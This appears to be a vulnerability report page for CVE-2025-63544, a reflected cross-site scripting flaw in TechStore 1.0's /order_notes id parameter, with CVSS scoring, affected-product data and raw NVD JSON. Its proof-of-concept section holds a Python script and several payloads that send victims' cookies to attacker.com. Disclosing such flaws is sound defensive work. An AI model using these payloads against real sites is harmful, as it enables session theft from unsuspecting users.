Security Vulnerability Report
中文
CVE-2025-63544 CVSS 6.1 MEDIUM

CVE-2025-63544

Published: 2025-11-07 21:15:42
Last Modified: 2025-11-21 16:19:29

Description

TechStore 1.0 is vulnerable to Cross Site Scripting (XSS) in /order_notes via the id parameter.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nooncarlett:techstore:1.0:*:*:*:*:*:*:* - VULNERABLE
TechStore 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63544 PoC - TechStore 1.0 XSS in /order_notes via id parameter # This PoC demonstrates the XSS vulnerability in TechStore 1.0 import requests from urllib.parse import quote target_url = "http://target.com/order_notes" # XSS payload - Cookie stealing example xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" # Construct the malicious URL malicious_url = f"{target_url}?id={quote(xss_payload)}" print(f"[*] CVE-2025-63544 - TechStore 1.0 XSS PoC") print(f"[*] Target: {target_url}") print(f"[*] Malicious URL: {malicious_url}") # Alternative payloads: # <img src=x onerror="alert(document.domain)"> # <svg/onload=alert(document.cookie)> # "><script>document.location='https://attacker.com/log?cookie='+document.cookie</script> # Send request to demonstrate the vulnerability try: response = requests.get(malicious_url, timeout=10) print(f"[*] Request sent to target") print(f"[*] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63544", "sourceIdentifier": "[email protected]", "published": "2025-11-07T21:15:41.577", "lastModified": "2025-11-21T16:19:29.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TechStore 1.0 is vulnerable to Cross Site Scripting (XSS) in /order_notes via the id parameter."}, {"lang": "es", "value": "TechStore 1.0 es vulnerable a Cross-Site Scripting (XSS) en /order_notes a través del parámetro id."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nooncarlett:techstore:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "52E5844D-E842-471F-AB10-162145F07E77"}]}]}], "references": [{"url": "https://gist.github.com/LuigiGrimaldi/5e9e66b12973bddd35f933a6d0cd2730", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}